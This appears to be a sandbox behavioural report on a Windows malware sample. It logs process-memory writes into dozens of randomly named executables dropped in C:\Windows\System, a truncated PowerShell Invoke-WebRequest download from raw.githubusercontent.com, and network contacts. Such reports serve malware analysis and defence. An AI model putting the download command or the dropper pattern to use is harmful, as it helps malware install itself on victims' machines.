PID 1168 wrote to memory of 1188 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\tyaBnEP.exe
PID 1168 wrote to memory of 1188 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\tyaBnEP.exe
PID 1168 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\ayvBFmb.exe
PID 1168 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\ayvBFmb.exe
PID 1168 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\eDnfZcH.exe
PID 1168 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\eDnfZcH.exe
PID 1168 wrote to memory of 4128 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\ErEKwag.exe
PID 1168 wrote to memory of 4128 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\ErEKwag.exe
PID 1168 wrote to memory of 1120 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\YnvvLfp.exe
PID 1168 wrote to memory of 1120 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\YnvvLfp.exe
PID 1168 wrote to memory of 4124 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\noiElLe.exe
PID 1168 wrote to memory of 4124 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\noiElLe.exe
PID 1168 wrote to memory of 4556 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\XOWugEG.exe
PID 1168 wrote to memory of 4556 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\XOWugEG.exe
PID 1168 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\tMkYClM.exe
PID 1168 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\tMkYClM.exe
PID 1168 wrote to memory of 400 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\skatMhL.exe
PID 1168 wrote to memory of 400 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\skatMhL.exe

Processes

C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "


C:\Windows\System\BPDTNHB.exe

C:\Windows\System\nricyFb.exe

C:\Windows\System\nricyFb.exe

C:\Windows\System\gpovuoc.exe

C:\Windows\System\gpovuoc.exe

C:\Windows\System\pUgEtuK.exe

C:\Windows\System\pUgEtuK.exe

C:\Windows\System\YBJzzNE.exe

C:\Windows\System\YBJzzNE.exe

C:\Windows\System\ARxSOQM.exe

C:\Windows\System\ARxSOQM.exe

C:\Windows\System\pksyOem.exe

C:\Windows\System\pksyOem.exe

C:\Windows\System\mvWBFBH.exe

C:\Windows\System\mvWBFBH.exe

C:\Windows\System\AfBRpRc.exe

C:\Windows\System\AfBRpRc.exe

C:\Windows\System\scWeIjC.exe

C:\Windows\System\scWeIjC.exe

C:\Windows\System\bYyIWda.exe

C:\Windows\System\bYyIWda.exe

C:\Windows\System\oRSwRva.exe

C:\Windows\System\oRSwRva.exe

C:\Windows\System\Tmtgurs.exe

C:\Windows\System\Tmtgurs.exe

C:\Windows\System\zQUUBAn.exe

C:\Windows\System\zQUUBAn.exe

C:\Windows\System\YMncbTY.exe

C:\Windows\System\YMncbTY.exe

C:\Windows\System\CCRlJBL.exe

C:\Windows\System\CCRlJBL.exe

C:\Windows\System\WAWOzIU.exe

C:\Windows\System\WAWOzIU.exe

C:\Windows\System\wBcBLlB.exe

C:\Windows\System\wBcBLlB.exe

C:\Windows\System\zSwJqUO.exe

C:\Windows\System\zSwJqUO.exe

C:\Windows\System\SVqLTAW.exe

C:\Windows\System\SVqLTAW.exe

C:\Windows\System\ISxjtkh.exe

C:\Windows\System\ISxjtkh.exe

C:\Windows\System\ArJdEVW.exe

C:\Windows\System\ArJdEVW.exe

C:\Windows\System\GmFSDbc.exe

C:\Windows\System\GmFSDbc.exe

C:\Windows\System\qdqmjmt.exe

C:\Windows\System\qdqmjmt.exe

C:\Windows\System\JTXswbS.exe

C:\Windows\System\JTXswbS.exe

C:\Windows\System\SLfnVkY.exe

C:\Windows\System\SLfnVkY.exe

C:\Windows\System\MoRNVti.exe

C:\Windows\System\MoRNVti.exe

C:\Windows\System\IYkGlgp.exe

C:\Windows\System\IYkGlgp.exe

C:\Windows\System\nZgggqn.exe

C:\Windows\System\nZgggqn.exe

C:\Windows\System\AvBdMcT.exe

C:\Windows\System\AvBdMcT.exe

C:\Windows\System\xLPlBcK.exe

C:\Windows\System\xLPlBcK.exe

C:\Windows\System\MOelrSB.exe

C:\Windows\System\MOelrSB.exe

C:\Windows\System\CTFdpGw.exe

C:\Windows\System\CTFdpGw.exe

C:\Windows\System\hjPEbrx.exe

C:\Windows\System\hjPEbrx.exe

C:\Windows\System\GWqMFfK.exe

C:\Windows\System\GWqMFfK.exe

C:\Windows\System\GKOIwxP.exe

C:\Windows\System\GKOIwxP.exe

C:\Windows\System\NOQiumO.exe

C:\Windows\System\NOQiumO.exe

C:\Windows\System\ZJeBrcE.exe

C:\Windows\System\ZJeBrcE.exe

C:\Windows\System\EIqimPE.exe

C:\Windows\System\EIqimPE.exe

C:\Windows\System\SthZVuq.exe

C:\Windows\System\SthZVuq.exe

C:\Windows\System\UVfVIvg.exe

C:\Windows\System\UVfVIvg.exe

C:\Windows\System\xAJKWcP.exe

C:\Windows\System\xAJKWcP.exe

C:\Windows\System\dRUkzXj.exe

C:\Windows\System\dRUkzXj.exe

C:\Windows\System\GFglhGz.exe

C:\Windows\System\GFglhGz.exe

C:\Windows\System\VwKeEVC.exe

C:\Windows\System\VwKeEVC.exe

C:\Windows\System\eLApzli.exe

C:\Windows\System\eLApzli.exe

C:\Windows\System\stKozvO.exe

C:\Windows\System\stKozvO.exe

C:\Windows\System\JPKvDgV.exe

C:\Windows\System\JPKvDgV.exe

C:\Windows\System\geKXXDa.exe

C:\Windows\System\geKXXDa.exe

C:\Windows\System\umlIsRq.exe

C:\Windows\System\umlIsRq.exe

C:\Windows\System\zlTbXkm.exe

C:\Windows\System\zlTbXkm.exe

C:\Windows\System\OPIIsao.exe

C:\Windows\System\OPIIsao.exe

C:\Windows\System\LHRJRAJ.exe

C:\Windows\System\LHRJRAJ.exe

C:\Windows\System\AbygqrW.exe

C:\Windows\System\AbygqrW.exe

C:\Windows\System\xJQpSpx.exe

C:\Windows\System\xJQpSpx.exe

C:\Windows\System\MSkkhgv.exe

C:\Windows\System\MSkkhgv.exe

C:\Windows\System\ggGwGCQ.exe

C:\Windows\System\ggGwGCQ.exe

C:\Windows\System\moAeoAY.exe

C:\Windows\System\moAeoAY.exe

C:\Windows\System\FbiJpAf.exe

C:\Windows\System\FbiJpAf.exe

C:\Windows\System\KwwuUhU.exe

C:\Windows\System\KwwuUhU.exe

C:\Windows\System\rdWnbsE.exe

C:\Windows\System\rdWnbsE.exe

C:\Windows\System\twRWBdj.exe

C:\Windows\System\twRWBdj.exe

C:\Windows\System\MGHUoPJ.exe

C:\Windows\System\MGHUoPJ.exe

C:\Windows\System\SlwvKlG.exe

C:\Windows\System\SlwvKlG.exe

C:\Windows\System\JoLCiyC.exe

C:\Windows\System\JoLCiyC.exe

C:\Windows\System\IGwfsPr.exe

C:\Windows\System\IGwfsPr.exe

C:\Windows\System\eGhemLr.exe

C:\Windows\System\eGhemLr.exe

C:\Windows\System\zuDwyEI.exe

C:\Windows\System\zuDwyEI.exe

C:\Windows\System\NzKvDBJ.exe

C:\Windows\System\NzKvDBJ.exe

C:\Windows\System\AqrqFeO.exe

C:\Windows\System\AqrqFeO.exe

C:\Windows\System\XixgQWH.exe

C:\Windows\System\XixgQWH.exe

C:\Windows\System\mAkYgdC.exe

C:\Windows\System\mAkYgdC.exe

C:\Windows\System\YuYxlct.exe

C:\Windows\System\YuYxlct.exe

C:\Windows\System\gHkigEr.exe

C:\Windows\System\gHkigEr.exe

C:\Windows\System\EETTZVy.exe

C:\Windows\System\EETTZVy.exe

C:\Windows\System\vzksmbQ.exe

C:\Windows\System\vzksmbQ.exe

C:\Windows\System\HzWvBAy.exe

C:\Windows\System\HzWvBAy.exe

C:\Windows\System\EMNlrzV.exe

C:\Windows\System\EMNlrzV.exe

C:\Windows\System\CEKntky.exe

C:\Windows\System\CEKntky.exe

C:\Windows\System\tqITWZY.exe

C:\Windows\System\tqITWZY.exe

C:\Windows\System\STBZSNZ.exe

C:\Windows\System\STBZSNZ.exe

C:\Windows\System\auqomyk.exe

C:\Windows\System\auqomyk.exe

C:\Windows\System\TGyoGec.exe

C:\Windows\System\TGyoGec.exe

C:\Windows\System\IhTDOJE.exe

C:\Windows\System\IhTDOJE.exe

C:\Windows\System\nzJydmn.exe

C:\Windows\System\nzJydmn.exe

C:\Windows\System\UKNEcNU.exe

C:\Windows\System\UKNEcNU.exe

C:\Windows\System\qBOWqYQ.exe

C:\Windows\System\qBOWqYQ.exe

C:\Windows\System\GLHvInd.exe

C:\Windows\System\GLHvInd.exe

C:\Windows\System\JllFXyw.exe

C:\Windows\System\JllFXyw.exe

C:\Windows\System\puaEuNF.exe

C:\Windows\System\puaEuNF.exe

C:\Windows\System\SCemeQI.exe

C:\Windows\System\SCemeQI.exe

C:\Windows\System\Njrwyya.exe

C:\Windows\System\Njrwyya.exe

C:\Windows\System\lFlrzOI.exe

C:\Windows\System\lFlrzOI.exe

C:\Windows\System\hqpsxna.exe

C:\Windows\System\hqpsxna.exe

C:\Windows\System\oXemSSa.exe

C:\Windows\System\oXemSSa.exe

C:\Windows\System\aKycaPt.exe

C:\Windows\System\aKycaPt.exe

C:\Windows\System\vevqEcT.exe

C:\Windows\System\vevqEcT.exe

C:\Windows\System\bWQEkps.exe

C:\Windows\System\bWQEkps.exe

C:\Windows\System\RaJlUrw.exe

C:\Windows\System\RaJlUrw.exe

C:\Windows\System\JNSVXmv.exe

C:\Windows\System\JNSVXmv.exe

C:\Windows\System\RSduXIY.exe

C:\Windows\System\RSduXIY.exe

C:\Windows\System\xYxGvub.exe

C:\Windows\System\xYxGvub.exe

C:\Windows\System\wOpeoAR.exe

C:\Windows\System\wOpeoAR.exe

C:\Windows\System\zeayeyU.exe

C:\Windows\System\zeayeyU.exe

C:\Windows\System\DZOksbJ.exe

C:\Windows\System\DZOksbJ.exe

C:\Windows\System\AMjCTbG.exe

C:\Windows\System\AMjCTbG.exe

C:\Windows\System\xOOimeo.exe

C:\Windows\System\xOOimeo.exe

C:\Windows\System\TzBjdTC.exe

C:\Windows\System\TzBjdTC.exe

C:\Windows\System\bkljZuc.exe

C:\Windows\System\bkljZuc.exe

C:\Windows\System\JHcdxdo.exe

C:\Windows\System\JHcdxdo.exe

C:\Windows\System\rkLczzm.exe

C:\Windows\System\rkLczzm.exe

C:\Windows\System\QdAFxIX.exe

C:\Windows\System\QdAFxIX.exe

C:\Windows\System\kUKbgHd.exe

C:\Windows\System\kUKbgHd.exe

C:\Windows\System\yjVJlDI.exe

C:\Windows\System\yjVJlDI.exe

C:\Windows\System\gAXsNTT.exe

C:\Windows\System\gAXsNTT.exe

C:\Windows\System\lJyZklk.exe

C:\Windows\System\lJyZklk.exe

C:\Windows\System\wNNMlAk.exe

C:\Windows\System\wNNMlAk.exe

C:\Windows\System\AgSxIvi.exe

C:\Windows\System\AgSxIvi.exe

C:\Windows\System\sEvtxoJ.exe

C:\Windows\System\sEvtxoJ.exe

C:\Windows\System\useLxKS.exe

C:\Windows\System\useLxKS.exe

C:\Windows\System\XvrvcCJ.exe

C:\Windows\System\XvrvcCJ.exe

C:\Windows\System\rdnveva.exe

C:\Windows\System\rdnveva.exe

C:\Windows\System\mJzyjoi.exe

C:\Windows\System\mJzyjoi.exe

C:\Windows\System\RrRXNEO.exe

C:\Windows\System\RrRXNEO.exe

C:\Windows\System\vUpcRkL.exe

C:\Windows\System\vUpcRkL.exe

C:\Windows\System\lXMfdlG.exe

C:\Windows\System\lXMfdlG.exe

C:\Windows\System\Mordzsr.exe

C:\Windows\System\Mordzsr.exe

C:\Windows\System\MmAhhMk.exe

C:\Windows\System\MmAhhMk.exe

C:\Windows\System\DaCQGzH.exe

C:\Windows\System\DaCQGzH.exe

C:\Windows\System\fgOtEmq.exe

C:\Windows\System\fgOtEmq.exe

C:\Windows\System\vmiprLA.exe

C:\Windows\System\vmiprLA.exe

C:\Windows\System\PskXWkb.exe

C:\Windows\System\PskXWkb.exe

C:\Windows\System\GkPfJtf.exe

C:\Windows\System\GkPfJtf.exe

C:\Windows\System\pXPgCHX.exe

C:\Windows\System\pXPgCHX.exe

C:\Windows\System\CofAGYY.exe

C:\Windows\System\CofAGYY.exe

C:\Windows\System\xlWyUmk.exe

C:\Windows\System\xlWyUmk.exe

C:\Windows\System\diSrAlt.exe

C:\Windows\System\diSrAlt.exe

C:\Windows\System\SBeJiBS.exe

C:\Windows\System\SBeJiBS.exe

C:\Windows\System\geJYsZo.exe

C:\Windows\System\geJYsZo.exe

C:\Windows\System\rZYJVmT.exe

C:\Windows\System\rZYJVmT.exe

C:\Windows\System\rnsWpii.exe

C:\Windows\System\rnsWpii.exe

C:\Windows\System\GYERpVH.exe

C:\Windows\System\GYERpVH.exe

C:\Windows\System\CZMEiTo.exe

C:\Windows\System\CZMEiTo.exe

C:\Windows\System\jdmVtPL.exe

C:\Windows\System\jdmVtPL.exe

C:\Windows\System\PvZWkdm.exe

C:\Windows\System\PvZWkdm.exe

C:\Windows\System\oLkHFwY.exe

C:\Windows\System\oLkHFwY.exe

C:\Windows\System\ukTikFr.exe

C:\Windows\System\ukTikFr.exe

C:\Windows\System\zRJFcwL.exe

C:\Windows\System\zRJFcwL.exe

C:\Windows\System\gdBFOdr.exe

C:\Windows\System\gdBFOdr.exe

C:\Windows\System\cxWKflx.exe

C:\Windows\System\cxWKflx.exe

C:\Windows\System\LwFQogA.exe

C:\Windows\System\LwFQogA.exe

C:\Windows\System\oQzDXtv.exe

C:\Windows\System\oQzDXtv.exe

C:\Windows\System\KYpXtzl.exe

C:\Windows\System\KYpXtzl.exe

C:\Windows\System\SgNIxHE.exe

C:\Windows\System\SgNIxHE.exe

C:\Windows\System\PKCfBSQ.exe

C:\Windows\System\PKCfBSQ.exe

C:\Windows\System\DPrcHfw.exe

C:\Windows\System\DPrcHfw.exe

C:\Windows\System\jbHxQjH.exe

C:\Windows\System\jbHxQjH.exe

C:\Windows\System\nxzzRNt.exe

C:\Windows\System\nxzzRNt.exe

C:\Windows\System\tUnlvCO.exe

C:\Windows\System\tUnlvCO.exe

C:\Windows\System\zxKOtIQ.exe

C:\Windows\System\zxKOtIQ.exe

C:\Windows\System\pKPgqoy.exe

C:\Windows\System\pKPgqoy.exe

C:\Windows\System\VHQxuRR.exe

C:\Windows\System\VHQxuRR.exe

C:\Windows\System\fpExrDg.exe

C:\Windows\System\fpExrDg.exe

C:\Windows\System\NGYVZKk.exe

C:\Windows\System\NGYVZKk.exe

C:\Windows\System\pAqJCLn.exe

C:\Windows\System\pAqJCLn.exe

C:\Windows\System\TDKBCyS.exe

C:\Windows\System\TDKBCyS.exe

C:\Windows\System\WkyZNwn.exe

C:\Windows\System\WkyZNwn.exe

C:\Windows\System\gRyydzx.exe

C:\Windows\System\gRyydzx.exe

C:\Windows\System\eprJqeG.exe

C:\Windows\System\eprJqeG.exe

C:\Windows\System\aoZRxfO.exe

C:\Windows\System\aoZRxfO.exe

C:\Windows\System\lxXLGhL.exe

C:\Windows\System\lxXLGhL.exe

C:\Windows\System\JKUjsjB.exe

C:\Windows\System\JKUjsjB.exe

C:\Windows\System\kDlLYsb.exe

C:\Windows\System\kDlLYsb.exe

C:\Windows\System\OLeMOcG.exe

C:\Windows\System\OLeMOcG.exe

C:\Windows\System\zXmihua.exe

C:\Windows\System\zXmihua.exe

C:\Windows\System\SZDaMrk.exe

C:\Windows\System\SZDaMrk.exe

C:\Windows\System\eqXxjbw.exe

C:\Windows\System\eqXxjbw.exe

C:\Windows\System\RHlWrmY.exe

C:\Windows\System\RHlWrmY.exe

C:\Windows\System\IeWEByV.exe

C:\Windows\System\IeWEByV.exe

C:\Windows\System\gbdncQB.exe

C:\Windows\System\gbdncQB.exe

C:\Windows\System\NhRWnJh.exe

C:\Windows\System\NhRWnJh.exe

C:\Windows\System\hpIHFKd.exe

C:\Windows\System\hpIHFKd.exe

C:\Windows\System\LERBrBq.exe

C:\Windows\System\LERBrBq.exe

C:\Windows\System\yoVVSkb.exe

C:\Windows\System\yoVVSkb.exe

C:\Windows\System\uiuspMH.exe

C:\Windows\System\uiuspMH.exe

C:\Windows\System\ojSXGvS.exe

C:\Windows\System\ojSXGvS.exe

C:\Windows\System\vjcWqWP.exe

C:\Windows\System\vjcWqWP.exe

C:\Windows\System\mXhmQio.exe

C:\Windows\System\mXhmQio.exe

C:\Windows\System\mGhIUZB.exe

C:\Windows\System\mGhIUZB.exe

C:\Windows\System\SDJlRAu.exe

C:\Windows\System\SDJlRAu.exe

C:\Windows\System\xMpdyTG.exe

C:\Windows\System\xMpdyTG.exe

C:\Windows\System\EOMsKwX.exe

C:\Windows\System\EOMsKwX.exe

C:\Windows\System\mEALefQ.exe

C:\Windows\System\mEALefQ.exe

C:\Windows\System\zoRMcae.exe

C:\Windows\System\zoRMcae.exe

C:\Windows\System\bgQrpcD.exe

C:\Windows\System\bgQrpcD.exe

C:\Windows\System\wnnfGPe.exe

C:\Windows\System\wnnfGPe.exe

C:\Windows\System\tYEuwPM.exe

C:\Windows\System\tYEuwPM.exe

C:\Windows\System\UxdQfqN.exe

C:\Windows\System\UxdQfqN.exe

C:\Windows\System\FDHhWpi.exe

C:\Windows\System\FDHhWpi.exe

C:\Windows\System\sodEijc.exe

C:\Windows\System\sodEijc.exe

C:\Windows\System\vmdSuRa.exe

C:\Windows\System\vmdSuRa.exe

C:\Windows\System\gNAUATg.exe

C:\Windows\System\gNAUATg.exe

C:\Windows\System\zLuqgHB.exe

C:\Windows\System\zLuqgHB.exe

C:\Windows\System\LEGEwXG.exe

C:\Windows\System\LEGEwXG.exe

C:\Windows\System\KdhUTQh.exe

C:\Windows\System\KdhUTQh.exe

C:\Windows\System\hcuiBml.exe

C:\Windows\System\hcuiBml.exe

C:\Windows\System\aOoDmyW.exe

C:\Windows\System\aOoDmyW.exe

C:\Windows\System\kqpmtho.exe

C:\Windows\System\kqpmtho.exe

C:\Windows\System\RwswiYD.exe

C:\Windows\System\RwswiYD.exe

C:\Windows\System\ZGTtCfX.exe

C:\Windows\System\ZGTtCfX.exe

C:\Windows\System\bxQkWhU.exe

C:\Windows\System\bxQkWhU.exe

C:\Windows\System\EqCMdxS.exe

C:\Windows\System\EqCMdxS.exe

C:\Windows\System\UXVjosC.exe

C:\Windows\System\UXVjosC.exe

C:\Windows\System\qpeZOrv.exe

C:\Windows\System\qpeZOrv.exe

C:\Windows\System\NcCwVzV.exe

C:\Windows\System\NcCwVzV.exe

C:\Windows\System\qoczCLH.exe

C:\Windows\System\qoczCLH.exe

C:\Windows\System\csbfaGX.exe

C:\Windows\System\csbfaGX.exe

C:\Windows\System\yYgENBh.exe

C:\Windows\System\yYgENBh.exe

C:\Windows\System\jkjvxaO.exe

C:\Windows\System\jkjvxaO.exe

C:\Windows\System\uzKZOym.exe

C:\Windows\System\uzKZOym.exe

C:\Windows\System\jAccWYn.exe

C:\Windows\System\jAccWYn.exe

C:\Windows\System\aRbhwRA.exe

C:\Windows\System\aRbhwRA.exe

C:\Windows\System\maOhfYW.exe

C:\Windows\System\maOhfYW.exe

C:\Windows\System\LyJlHTd.exe

C:\Windows\System\LyJlHTd.exe

C:\Windows\System\AnRcnbF.exe

C:\Windows\System\AnRcnbF.exe

C:\Windows\System\dzMdlFI.exe

C:\Windows\System\dzMdlFI.exe

C:\Windows\System\FnIxYQi.exe

C:\Windows\System\FnIxYQi.exe

C:\Windows\System\jPpdSYZ.exe

C:\Windows\System\jPpdSYZ.exe

C:\Windows\System\phbsZDF.exe

C:\Windows\System\phbsZDF.exe

C:\Windows\System\zXJZsIe.exe

C:\Windows\System\zXJZsIe.exe

C:\Windows\System\MrShJWB.exe

C:\Windows\System\MrShJWB.exe

C:\Windows\System\UIDWtRM.exe

C:\Windows\System\UIDWtRM.exe

C:\Windows\System\nZlbMfz.exe

C:\Windows\System\nZlbMfz.exe

C:\Windows\System\sFfgcXQ.exe

C:\Windows\System\sFfgcXQ.exe

C:\Windows\System\skBkPgV.exe

C:\Windows\System\skBkPgV.exe

C:\Windows\System\FNVlSCc.exe

C:\Windows\System\FNVlSCc.exe

C:\Windows\System\EFYsYec.exe

C:\Windows\System\EFYsYec.exe

C:\Windows\System\rUjPuWF.exe

C:\Windows\System\rUjPuWF.exe

C:\Windows\System\QHvSfbi.exe

C:\Windows\System\QHvSfbi.exe

C:\Windows\System\XMuTUQq.exe

C:\Windows\System\XMuTUQq.exe

C:\Windows\System\MlPgqUv.exe

C:\Windows\System\MlPgqUv.exe

C:\Windows\System\kxOuXpe.exe

C:\Windows\System\kxOuXpe.exe

C:\Windows\System\bOqIuyK.exe

C:\Windows\System\bOqIuyK.exe

C:\Windows\System\BWDcnwy.exe

C:\Windows\System\BWDcnwy.exe

C:\Windows\System\FkhMeTo.exe

C:\Windows\System\FkhMeTo.exe

C:\Windows\System\PElzFPR.exe

C:\Windows\System\PElzFPR.exe

C:\Windows\System\YQBsEVi.exe

C:\Windows\System\YQBsEVi.exe

C:\Windows\System\lffHsDr.exe

C:\Windows\System\lffHsDr.exe

C:\Windows\System\XOkXGxB.exe

C:\Windows\System\XOkXGxB.exe

C:\Windows\System\IJxXikk.exe

C:\Windows\System\IJxXikk.exe

C:\Windows\System\OaoGuji.exe

C:\Windows\System\OaoGuji.exe

C:\Windows\System\jYzyXSK.exe

C:\Windows\System\jYzyXSK.exe

C:\Windows\System\gSMEJPd.exe

C:\Windows\System\gSMEJPd.exe

C:\Windows\System\TboSUCd.exe

C:\Windows\System\TboSUCd.exe

C:\Windows\System\XcmSXxQ.exe

C:\Windows\System\XcmSXxQ.exe

C:\Windows\System\YFzOMIB.exe

C:\Windows\System\YFzOMIB.exe

C:\Windows\System\dXHDppC.exe

C:\Windows\System\dXHDppC.exe

C:\Windows\System\hvfxCCJ.exe

C:\Windows\System\hvfxCCJ.exe

C:\Windows\System\SdhNYhQ.exe

C:\Windows\System\SdhNYhQ.exe

C:\Windows\System\OCcwsYU.exe

C:\Windows\System\OCcwsYU.exe

C:\Windows\System\IHJFddL.exe

C:\Windows\System\IHJFddL.exe

C:\Windows\System\UDphHUC.exe

C:\Windows\System\UDphHUC.exe

C:\Windows\System\SOqMqFz.exe

C:\Windows\System\SOqMqFz.exe

C:\Windows\System\xdbiUdZ.exe

C:\Windows\System\xdbiUdZ.exe

C:\Windows\System\OPjXgrX.exe

C:\Windows\System\OPjXgrX.exe

C:\Windows\System\hgSHUGX.exe

C:\Windows\System\hgSHUGX.exe

C:\Windows\System\uLsPmZT.exe

C:\Windows\System\uLsPmZT.exe

C:\Windows\System\ZQCVuQp.exe

C:\Windows\System\ZQCVuQp.exe

C:\Windows\System\EaSihnN.exe

C:\Windows\System\EaSihnN.exe

C:\Windows\System\ZalYURQ.exe

C:\Windows\System\ZalYURQ.exe

C:\Windows\System\bEyXBCB.exe

C:\Windows\System\bEyXBCB.exe

C:\Windows\System\lbAvqII.exe

C:\Windows\System\lbAvqII.exe

C:\Windows\System\cpBMSBQ.exe

C:\Windows\System\cpBMSBQ.exe

C:\Windows\System\pIlrALk.exe

C:\Windows\System\pIlrALk.exe

C:\Windows\System\stOKRlo.exe

C:\Windows\System\stOKRlo.exe

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 52.111.229.48:443 tcp

Files
